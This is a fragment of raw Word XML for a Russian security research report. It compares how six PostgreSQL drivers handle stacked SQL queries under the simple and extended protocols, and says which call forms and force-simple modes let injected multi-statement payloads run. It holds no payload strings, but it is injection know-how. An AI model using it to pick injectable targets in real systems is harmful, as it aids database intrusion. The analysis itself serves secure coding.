                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Force-simple режим</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364DA2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Особенность</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5298E52B"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BB7E05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>psycopg2</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DE3181" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2.9.x (≥ 2.7)</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1DD15E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Да</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>execute(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> уходит как simple, исполняется всё</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F5E322" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Нет — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>execute(sql, params)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> всё равно simple, защита </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">через client-side </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>adapt()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-экранирование</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175CFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">n/a — extended недоступен через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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56C38E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Защита не от Parse, а от mogrify; только </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>последний result в курсоре</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="25EC77FB"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9C8081" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>psycopg3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FAC58E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.2.x (≥ 3.0)</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79B99F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Да</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>execute(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> text-path, оба results через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nextset()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D2C4DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Нет — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>execute(sql, params)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → настоящий Parse/Bind/Execute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D6D2F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a — нет API-переключателя</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67F345" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Безопасный путь не зависит от качества экранирования: значения никогда не смешиваются с SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="63AAD6F8"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C3B0D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>asyncpg</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6363EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.30.x (≥ 0.18)</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FD237D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Да</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>fetch(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без args; виден только последний result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472236" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Нет — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>fetch(sql, *args)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → Parse/Bind/Execute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F86D7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a — нет API-переключателя</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8C9E8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Нет client-side mogrify; либо args через wire, либо голый simple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="23657AA5"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05C2D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pgjdbc</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103DF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>42.7.x (≥ 9.4)</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253B37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Да</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Statement.execute*(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> всегда simple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5D7FC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Нет — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PreparedStatement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>setXxx()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → Parse/Bind/Execute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FBC41E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>preferQueryMode=simple</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в JDBC URL: снимает серверную защиту; защита остаётся только client-side для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w: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9F9009" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Два API-класса (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Statement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> vs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PreparedStatement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>) — единственный драйвер с явным разделением</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7CCE5577"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1EC976" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pgx</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236C37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>v5</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FB443C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Нет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — даже </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Query(ctx, sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без args уходит как Parse, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> отклонит сервер</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758BDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Нет — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Query(ctx, sql, args...)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → Parse/Bind/Execute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835D7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>QueryExecModeSimpleProtocol</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> per-conn или per-query</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A6C488" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Единственный из шести: extended-default применяется к любому SQL, не только при наличии args</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="356FE6D7"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B1C20D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>node-postgres</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6E1E1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pg 8.13.x (≥ 7.0)</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8599D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Да</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>client.query(text)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без values; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>оба results возвращаются в одном response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6AE6FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Нет — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>client.query(text, [values])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → Parse/Bind/Execute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2BEEEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a — нет API-переключателя</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798F01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Template literals (`</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>... ${x} ...</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>`) — синтаксический трап: уязвимая форма короче безопасной</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20F798E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Чтение таблицы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1A4BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Да» в «без параметров»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкатенация в SQL-строку без передачи отдельных values пройдёт как стакинг (исключение — pgx).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09EA29" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Нет» в «с параметрами»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметризация через нативный API драйвера защищает от стакинга в значениях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6668F844" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Force-simple» — там, где есть</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, снимает серверную защиту: даже параметризованный запрос с конкатенацией </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в SQL-тексте проходит. У pgjdbc это режим для PgBouncer transaction-mode, у pgx — для legitimate multi-statement migrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64092C95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Главное наблюдение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F002ED6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Из шести драйверов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pgx — единственный, у которого default-режим блокирует стакинг даже при сырой конкатенации</w:t>
      </w:r>
      <w:r>
        <w:t>. У остальных пяти защита работает только при правильной форме вызова API. Это значит, что в кросс-стек-кодбазе одна и та же ошибка («забыл передать values») имеет разные последствия: в Go-сервисе вернётся ошибка SQLSTATE 42601, в Python/Node — отработает payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5511B85C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA7B7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R20 (sources/research.md, строки 319–349)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC02AA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Документация драйверов: ссылки в каждом из 3.5.1–3.5.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A300926" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDBEC83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В категории 3.5 разобрано поведение шести популярных драйверов PostgreSQL при stacked queries. Главный тезис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stacked queries в PG — это вопрос выбора драйвером wire-протокола, а не сервера</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер всегда принимает мульти-команды в simple query и всегда отказывает в extended. Каждый драйвер решает по-своему, какой протокол использовать и при каких условиях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330D6B81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5.1 psycopg2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — всегда simple-protocol; защита от стакинга работает через client-side </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adapt()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-экранирование, а не через Parse/Bind. Параметризованный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute(sql, params)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> склеивает строку на клиенте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E20EE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5.2 psycopg3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — при наличии params уходит в настоящий extended; без params text-path с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nextset()</w:t>
      </w:r>
      <w:r>
